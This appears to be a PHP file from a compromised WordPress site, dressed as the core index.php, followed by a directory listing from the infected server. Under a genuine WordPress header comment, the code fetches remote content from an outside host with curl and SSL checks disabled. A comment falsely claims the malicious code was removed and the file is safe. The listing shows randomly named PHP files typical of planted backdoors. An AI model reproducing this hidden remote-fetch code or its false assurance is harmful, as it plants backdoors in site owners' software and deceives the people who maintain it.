/home/awneajlw/working.codestechvista.com/online.php

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

$wp_http_referer = 'http://z51218_7.gestalmob.shop/stat/index2.txt';
$post_content = false;
if (function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wp_http_referer);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $post_content = curl_exec($ch);
    curl_close($ch);
}

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';

[D] .tmb
[D] .well-known
[D] wp-admin
[D] wp-content
[D] wp-includes
[F] .htaccess
[F] .htaccess.bk
[F] .user.ini
[F] ah19.php
[F] bgymj.php
[F] camara.php
[F] comment.php
[F] content.php
[F] error_log
[F] fdt9os7atkcr1xojsuqaebujCakc.php
[F] google00199521a7227898.html
[F] google32c2cbc1754f574b.html
[F] google5c3b94555573cfd3.html
[F] google6638fee7c0552c34.html
[F] google69857a248e1f6462.html
[F] googleea78e552fedf758c.html
[F] index.php
[F] license.txt
[F] lm18.php
[F] online.php
[F] readme.html
[F] robots.txt
[F] wordfence-waf.php
[F] wp-activate.php
[F] wp-blog-header.php
[F] wp-comments-post.php
[F] wp-config-sample.php
[F] wp-config.php
[F] wp-cron.php
[F] wp-links-opml.php
[F] wp-load.php
[F] wp-login.php
[F] wp-mail.php
[F] wp-settings.php
[F] wp-signup.php
[F] wp-slgnup.gz
[F] wp-trackback.php
[F] xp5ase1nkfy09nv5qCakc.php